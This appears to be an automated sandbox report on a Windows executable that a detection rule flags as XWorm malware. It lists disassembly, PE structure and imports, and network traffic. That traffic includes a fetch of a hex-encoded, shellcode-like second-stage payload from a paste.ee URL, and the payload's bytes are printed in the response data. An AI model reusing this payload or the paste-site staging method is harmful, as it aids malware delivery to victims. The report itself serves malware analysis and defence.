                                            dec ecx
                                            jc 00007FA2D54229D9h
                                            bound eax, dword ptr [ecx+58h]
                                            pop eax
                                            pop eax
                                            pop eax
                                            cmp byte ptr [eax], bh
                                            pop ecx
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            dec esp
                                            xor dword ptr [eax], eax
                                            or esi, dword ptr [esi]
                                            pop ds
                                            xchg eax, esp
                                            jmp far 4F97h : 452C8D24h
                                            fst qword ptr [edi+7Eh]
                                            mov al, byte ptr [47FFA77Ah]
                                            jo 00007FA2D5422A0Dh
                                            wait
                                            dec eax
                                            mov ecx, 3E4E91ECh
                                            push cs
                                            popfd
                                            dec ebx
                                            cmp cl, byte ptr [edi-53h]
                                            xor ebx, dword ptr [ecx-48EE309Ah]
                                            or al, 00h
                                            stosb
                                            add byte ptr [eax-2Dh], ah
                                            xchg eax, ebx
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            arpl bx, sp
                                            and dword ptr [eax], eax
                                            lodsb
                                            ror byte ptr [eax], cl
                                            add byte ptr [eax], al
                                            add al, 00h
                                            inc esp
                                            jc 00007FA2D5422A03h
                                            jnbe 00007FA2D54229A2h
                                            or eax, 55000801h
                                            xor esi, dword ptr [eax+eax+00h]
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x269d340x28.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2730000x97a24.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x248.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x2696980x26a000053ff183a1caf0587f80f2ee96a4d709unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .data0x26b0000x71a40x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x2730000x97a240x980004938482a66569e21ee7222ea2e4c90baFalse0.15507587633634867data3.032167914223034IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            EXE0x2734180xa000data1.0005126953125
                                            EXE0x27d4180x2dASCII text, with no line terminators1.1777777777777778
                                            RT_ICON0x27d4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.7128378378378378
                                            RT_ICON0x27d5700x368Device independent bitmap graphic, 16 x 32 x 24, image size 8320.8830275229357798
                                            RT_ICON0x27d8d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.8235815602836879
                                            RT_ICON0x27dd400x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.5161290322580645
                                            RT_ICON0x27e0280xca8Device independent bitmap graphic, 32 x 64 x 24, image size 32000.6805555555555556
                                            RT_ICON0x27ecd00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.599671669793621
                                            RT_ICON0x27fd780x668Device independent bitmap graphic, 48 x 96 x 4, image size 15360.375
                                            RT_ICON0x2803e00x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 72960.5612050163576882
                                            RT_ICON0x2820880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.49522821576763487
                                            RT_ICON0x2846300xa68Device independent bitmap graphic, 64 x 128 x 4, image size 25600.29429429429429427
                                            RT_ICON0x2850980x3228Device independent bitmap graphic, 64 x 128 x 24, image size 128000.49478193146417443
                                            RT_ICON0x2882c00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.42064241851676903
                                            RT_ICON0x28c4e80xa068Device independent bitmap graphic, 256 x 512 x 4, image size 409600.03253458016754335
                                            RT_ICON0x2965500x32028Device independent bitmap graphic, 256 x 512 x 24, image size 2048000.05124487404803749
                                            RT_ICON0x2c85780x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.04496700890611593
                                            RT_GROUP_ICON0x30a5a00xd8data0.5833333333333334
                                            RT_VERSION0x30a6780x3acdataEnglishUnited States0.5372340425531915
                                            DLLImport
                                            MSVBVM60.DLL__vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaVarVargNofree, __vbaAryMove, __vbaFreeVar, __vbaLineInputStr, __vbaLenBstr, __vbaStrVarMove, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaCopyBytes, __vbaResume, __vbaStrCat, __vbaVarTextTstEq, __vbaLsetFixstr, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaStrFixstr, __vbaStrTextCmp, __vbaBoolVarNull, _CIsin, __vbaErase, __vbaVarZero, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, __vbaLbound, __vbaRedimPreserve, _adj_fpatan, __vbaAryRebase1Var, __vbaFixstrConstruct, __vbaRedim, __vbaDerefAry, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, __vbaVarAnd, EVENT_SINK_QueryInterface, __vbaVarTextCmpEq, __vbaUI1I4, __vbaExceptHandler, __vbaPrintFile, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, __vbaI2Var, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaInStr, __vbaVar2Vec, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, __vbaPowerR8, _adj_fdiv_r, __vbaVarAdd, __vbaAryLock, __vbaStrComp, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaVarCopy, __vbaFpI4, _CIatan, __vbaStrMove, __vbaStrVarCopy, _allmul, __vbaVarTextCmpNe, _CItan, __vbaUI1Var, __vbaAryUnlock, _CIexp, __vbaI4ErrVar, __vbaFreeObj, __vbaFreeStr
                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States
                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 21, 2024 21:13:15.594980001 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:15.595041990 CEST44349704104.21.84.67192.168.2.5
                                            Apr 21, 2024 21:13:15.595155001 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:15.635490894 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:15.635518074 CEST44349704104.21.84.67192.168.2.5
                                            Apr 21, 2024 21:13:15.873517036 CEST44349704104.21.84.67192.168.2.5
                                            Apr 21, 2024 21:13:15.873611927 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:16.014533043 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:16.014578104 CEST44349704104.21.84.67192.168.2.5
                                            Apr 21, 2024 21:13:16.015547037 CEST44349704104.21.84.67192.168.2.5
                                            Apr 21, 2024 21:13:16.015649080 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:16.025365114 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:16.068150997 CEST44349704104.21.84.67192.168.2.5
                                            Apr 21, 2024 21:13:16.144665956 CEST44349704104.21.84.67192.168.2.5
                                            Apr 21, 2024 21:13:16.144772053 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:16.144794941 CEST44349704104.21.84.67192.168.2.5
                                            Apr 21, 2024 21:13:16.144865036 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:16.144871950 CEST44349704104.21.84.67192.168.2.5
                                            Apr 21, 2024 21:13:16.144927025 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:16.144933939 CEST44349704104.21.84.67192.168.2.5
                                            Apr 21, 2024 21:13:16.144994020 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:16.145000935 CEST44349704104.21.84.67192.168.2.5
                                            Apr 21, 2024 21:13:16.145051956 CEST44349704104.21.84.67192.168.2.5
                                            Apr 21, 2024 21:13:16.145076036 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:16.145117998 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:16.192981958 CEST49704443192.168.2.5104.21.84.67
                                            Apr 21, 2024 21:13:16.193042040 CEST44349704104.21.84.67192.168.2.5
                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 21, 2024 21:13:15.357073069 CEST6027653192.168.2.51.1.1.1
                                            Apr 21, 2024 21:13:15.582539082 CEST53602761.1.1.1192.168.2.5
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Apr 21, 2024 21:13:15.357073069 CEST192.168.2.51.1.1.10xaf62Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Apr 21, 2024 21:13:15.582539082 CEST1.1.1.1192.168.2.50xaf62No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                            Apr 21, 2024 21:13:15.582539082 CEST1.1.1.1192.168.2.50xaf62No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                            • paste.ee
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549704104.21.84.674435680C:\Users\user\Desktop\UmJMWJPQ9h.exe
                                            TimestampBytes transferredDirectionData
                                            2024-04-21 19:13:16 UTC62OUTGET /r/tC4AK HTTP/1.1
                                            User-Agent: Himanen
                                            Host: paste.ee
                                            2024-04-21 19:13:16 UTC1288INHTTP/1.1 200 OK
                                            Date: Sun, 21 Apr 2024 19:13:16 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Cache-Control: max-age=2592000
                                            strict-transport-security: max-age=63072000
                                            x-frame-options: DENY
                                            x-content-type-options: nosniff
                                            x-xss-protection: 1; mode=block
                                            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                            CF-Cache-Status: HIT
                                            Age: 241
                                            Last-Modified: Sun, 21 Apr 2024 19:09:15 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2vy6afWXNffdACX1J1wl0hB3NPG7MeYQZr%2Fe0iIR7BbCMp65dS%2F13aw4TS51g1vO1Q2fe9VvfyJ7%2B7T7bmmLDFFurC9JMWiw7n4nZJNkKNXKG7nsj4JXtKO%2BAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 877fb0bb7f3b7bdb-ATL
                                            alt-svc: h3=":443"; ma=86400
                                            2024-04-21 19:13:16 UTC81INData Raw: 61 31 30 0d 0a 36 30 45 38 34 45 30 30 30 30 30 30 36 42 30 30 36 35 30 30 37 32 30 30 36 45 30 30 36 35 30 30 36 43 30 30 33 33 30 30 33 32 30 30 30 30 30 30 36 45 30 30 37 34 30 30 36 34 30 30 36 43 30 30 36 43 30 30 30 30 30 30 30 30 30 30
                                            Data Ascii: a1060E84E0000006B00650072006E0065006C003300320000006E00740064006C006C0000000000
                                            2024-04-21 19:13:16 UTC1369INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 35 42 38 42 46 43 36 41 34 32 45 38 42 42 30 33 30 30 30 30 38 42 35 34 32 34 32 38 38 39 31 31 38 42 35 34 32 34 32 43 36 41 33 45 45 38 41 41 30 33 30 30 30 30 38 39 31 31 36 41 34 41 45 38 41 31 30 33 30 30 30 30 38 39 33 39 36 41 31 45 36 41 33 43 45 38 39 44 30 33 30 30 30 30 36 41 32 32 36 38 46 34 30 30 30 30 30 30 45 38 39 31 30 33 30 30 30 30 36 41 32 36 36 41 32 34 45 38 38 38 30 33 30 30 30 30 36 41 32 41 36 41 34 30 45 38 37 46 30 33 30 30 30 30 36 41 32 45 36 41 30 43 45
                                            Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F0300006A2E6A0CE
                                            2024-04-21 19:13:16 UTC1133INData Raw: 31 30 30 30 30 38 42 43 31 36 41 32 45 45 38 33 42 30 31 30 30 30 30 38 42 30 39 35 30 46 46 37 37 31 30 35 36 35 32 46 46 33 31 36 41 30 30 45 38 32 41 30 31 30 30 30 30 36 38 41 31 36 41 33 44 44 38 35 31 45 38 35 36 30 31 30 30 30 30 38 33 43 34 30 43 46 46 44 30 36 41 33 36 45 38 31 33 30 31 30 30 30 30 38 42 31 31 38 33 43 32 30 31 38 39 31 31 36 41 33 41 45 38 30 35 30 31 30 30 30 30 38 42 30 39 33 42 43 41 30 46 38 35 33 33 46 46 46 46 46 46 36 41 33 32 45 38 46 34 30 30 30 30 30 30 38 42 30 39 43 37 30 31 30 37 30 30 30 31 30 30 36 41 30 30 45 38 45 35 30 30 30 30 30 30 36 38 44 32 43 37 41 37 36 38 35 31 45 38 31 31 30 31 30 30 30 30 36 41 33 32 45 38 44 33 30 30 30 30 30 30 38 42 31 31 36 41 32 45 45 38 43 41 30 30 30 30 30 30 38 42 30 39 35 32
                                            Data Ascii: 100008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F40000008B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952
                                            2024-04-21 19:13:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:21:13:06
                                            Start date:21/04/2024
                                            Path:C:\Users\user\Desktop\UmJMWJPQ9h.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\UmJMWJPQ9h.exe"
                                            Imagebase:0x400000
                                            File size:3'162'112 bytes
                                            MD5 hash:C8FBDD732DFADEB0EABDE5A558EE010F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2372782874.0000000000850000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:4
                                            Start time:21:13:16
                                            Start date:21/04/2024
                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 1200
                                            Imagebase:0x260000
                                            File size:483'680 bytes
                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:0.4%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:4
                                              Total number of Limit Nodes:0
                                              execution_graph 544 4016e8 #100 545 401248 546 4012a6 545->546 547 40130e __vbaExceptHandler 545->547 546->547

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 4016e8-40170d #100
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2372228852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2372209191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372228852.0000000000412000.00000020.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372228852.0000000000419000.00000020.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372228852.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372228852.000000000044B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372228852.000000000045E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372228852.000000000048D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372228852.000000000061F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372444644.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372444644.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372480765.0000000000673000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372480765.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372480765.0000000000695000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372480765.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372480765.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372480765.00000000006D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2372480765.0000000000709000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_UmJMWJPQ9h.jbxd
                                              Similarity
                                              • API ID: #100
                                              • String ID:
                                              • API String ID: 1341478452-0
                                              • Opcode ID: 106363715bcb511c6d88c2ca67f11aab0bc643a449b70a3b1bffe191bd977fc2
                                              • Instruction ID: b708d4004a58abdc1b8a6f707902cc465867c3a8aa61aa7f58d1bd6fbfecec5d
                                              • Opcode Fuzzy Hash: 106363715bcb511c6d88c2ca67f11aab0bc643a449b70a3b1bffe191bd977fc2
                                              • Instruction Fuzzy Hash: 36E02B0698F3C14ED30387B059620882F304C032A431E08E7C880CE0E7888A488AC332
                                              Uniqueness

                                              Uniqueness Score: -1.00%